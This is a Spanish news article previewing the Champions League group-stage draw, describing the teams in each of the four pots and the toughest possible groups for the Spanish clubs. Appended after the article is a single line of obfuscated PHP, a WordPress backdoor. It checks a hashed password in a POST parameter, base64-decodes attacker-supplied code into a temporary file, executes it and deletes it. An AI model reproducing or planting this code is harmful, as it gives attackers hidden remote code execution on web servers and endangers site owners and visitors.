Los posibles grupos de la muerte del sorteo de la Champions League

Los equipos españoles no se libran de algunos cruces durísimos. El bombo 2 es muy fuerte y el 3 lleva sustos. El 4 contiene al Newcastle, la nueva revolución de Inglaterra.

Como siempre ocurre en los sorteos de Champions, el verdadero termómetro de los grupos los marcarán las urnas 3 y 4. Un Milan o un Lazio colorearían cualquier grupo hacia una dificultad mayor, sobre todo si del restante no se ha podido evitar algún coco. La entrada este curso del Newcastle también pone una trampa en el 4, habitualmente más sencillo que esta vez. Evitar a las urracas en este bombo será fundamental porque un grupo con Bayern, Milan y Newcastle, por ejemplo en el caso del Madrid, o Dortmund, Milan y Newcastle, en el del Barça, sería una complicación innecesaria para el primer tramo de la competición.

Bombo 1

El más duro de todos, el de los cabezas de serie. Uno de estos equipos será rival de Madrid, Atlético y Real Sociedad. Es el bombo de los campeones de ligas nacionales, de Champions y de Europa League. Por eso están el Sevilla y el Barcelona en él. Pero también, sobre todo, el PSG, el City y el Bayern. Cualquier de los tres supondría un bombazo. El City de Guardiola defiende corona. Es el mismo equipo campeón, con Haaland a la cabeza, aunque ha perdido a Gündogan, Laporte y Mahrez. A cambio, ha contratado a Gvardiol, Kovacic y Doku. Por su parte, el Bayern es una amenaza en Europa siempre y además este curso tiene a Kane. Por último, el PSG de Luis Enrique y Mbappé es un nuevo proyecto lleno de jugadores nuevos y ambiciones renovadas. Otro club peligroso es el Nápoles, que ha fichado a Lindstrom y ha conseguido retener a Kvaratskhelia y Osimhen. Además, completan el bombo el Feyenoord y el Benfica. Los portugueses, con Di María a la cabeza, pueden dar un susto a más de uno.

Bombo 2

Madrid Atlético están en una segunda unidad de equipos europeos. Los no campeones nacionales se ordenan por ranking UEFA, lo que deja un bombo lleno de equipos peligrosos. Especialmente los ingleses, con Manchester United y Arsenal a la cabeza. Los ‘gunners’ han armado un equipo de garantías con Arteta a la cabeza. Los fichajes de Declan Rice y Havertz le han dado una mayor profundidad al equipo. Igual de interesante es el United de Ten Hag, que en curso pasado dio un paso al frente evidente a nivel competitivo. Se le ha ido De Gea y ha fichado a Onana, cambio significativo en la portería. Otro conjunto duro es el Inter. El año pasado alcanzó la final y mantiene la base, aunque cambiando a Dzeko y Lukaku en ataque por Marcus Thuram. Los dos alemanes, Leipzig Dortmund, son correosos, aunque frágiles en defensa. Dani Olmo es la gran estrella de los primeros. El Oporto, por último, es defensivamente pegajoso con Pepe como capitán general.

Bombo 3

Los italianos son los equipos más potentes del bombo. El Milan ya alcanzó las semis en la pasada edición y mantiene el esqueleto de Pioli con Rafael Leao y Giroud como estiletes. El conjunto rossoneri sigue creciendo temporada tras temporada. La Lazio de Mauricio Sarri vuelve a la élite europea tras una brillante temporada anterior. No ha empezado bien el curso, pero con Immobile en el ataque y la calidad de Luis Alberto y Kamada, fichaje estrella, pueden comprometer a cualquier rival. Importante aparición del Sporting de Braga, que cada vez está más cerca de los tres grandes de Portugal. Abel Ruiz es la referencia de un equipo con Ricardo Horta, Pizzi y Bruma como otros argumentos ofensivos. El Shakhtar Donetsk vuelve a estar entre los conjuntos intermedios del bombo, al igual que el PSV con Luuk de Jong a la cabeza y Noah Lang como gran fichaje. Cierran el bombo el Salzburgo y su eterno desafío juvenil, que ya ha sorprendido a más de uno estos últimos años, y el Estrella Roja, que en realidad aporta más historia y vigor cuando juega como local qué nivel futbolístico. El Copenhague, el último equipo en sumarse al bombo 3 tras eliminar al Rakow polaco.

Bombo 4

La Real Sociedad partirá finalmente del bombo 4, el de los equipos teóricamente más débiles. No es así en todos los casos. Especialmente en el del Newcastle, que después de años de ostracismo ha regresado a la Champions por todo lo alto. El conjunto de Eddie Howe es sin duda la gran amenaza de la urna y tiene a Isak como estilete, además de otros muchos buenos futbolistas. Peligroso también él Union Berlín con Gosens y los potentes Fofana y Behrens como estiletes arriba. El Lens también ha dado sorpresas en Francia, aunque ha traspasado a sus jugadores de más nivel y le va a costar ser igual de competitivo que en la histórica campaña anterior. Dos históricos como Celtic Galatasaray también aguardan en el bombo, dos cuadros con jugadores como Furuhashi, en los escoceses, e Icardi como referencias ofensivas. Jugar en Celtic Park y en el Ali Sami Yen es un trago complicado para cualquiera siempre en Europa. Completan este bombo el Young Boys y el Royal Antwerp, sin duda los conjuntos más flojos del sorteo.

El sorteo, que se celebrará este jueves a las 18:00 en Mónaco, definirá la fase de grupos con muchas bombas de relojería. Aunque los cabezas de serie del bombo 1 parten con una ligera ventaja, este año tampoco se van a librar de tener un grupo complicado. Los campeones nacionales, más el Sevilla, campeón de la Europa League, esperarás lo que el sorteo les depare. En el 2 aguarda el Real Madrid junto con el Atlético, además de otros durísimos equipos como el Arsenal, Dortmund, Inter, United y Oporto, entre otros.

En cualquier caso, nadie está a salvo. El Madrid, por ejemplo, podría caer emparejado con el Bayern, el Milán y el Newcastle en un grupo que tendría una dificultad máxima. El City de Guardiola también sería un verdadero peligro para los equipos españoles. Los ingleses defienden el título y este año la final se disputará en Wembley.

Cocos

Real Madrid, Atlético y Real Sociedad tendrán que revisar con lupa a su rival del bombo 1. Bayern, City y PSG son los más duros, a lo que si se suma una mala combinación de otros bombos, podrían confrontar otro grupo de la muerte. El Sevilla ha entrado cabeza de serie y eso le da muchas opciones de pasar, sin embargo, solo es necesaria una pizca de mala suerte para que todos los planes de los hispalenses se tuerzan. Por ejemplo Sevilla, United, Milán y Galatasaray; o Bayern, Atlético, Lazio y Newcastle.

El Barça, que aunque parte del bombo 1 al igual que el Sevilla, no se puede relajar ni un suspiro si no se quiere quedar por tercera vez consecutiva fuera de los octavos de la Champions. Hay que recordar que se clasifican dos por grupo a los octavos y el tercero va a la Europa League. Contar con dos o tres rivales difíciles a las primeras de cambio en el torneo complica mucho el futuro. Lo ideal es ir de la mano de otro conjunto potente, aunque sea acabando como segundo, y clasificarse para octavos. De esta manera el pase está asegurado y en el cruce se evita al rival con el que ya se ha coincidido en la liguilla.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}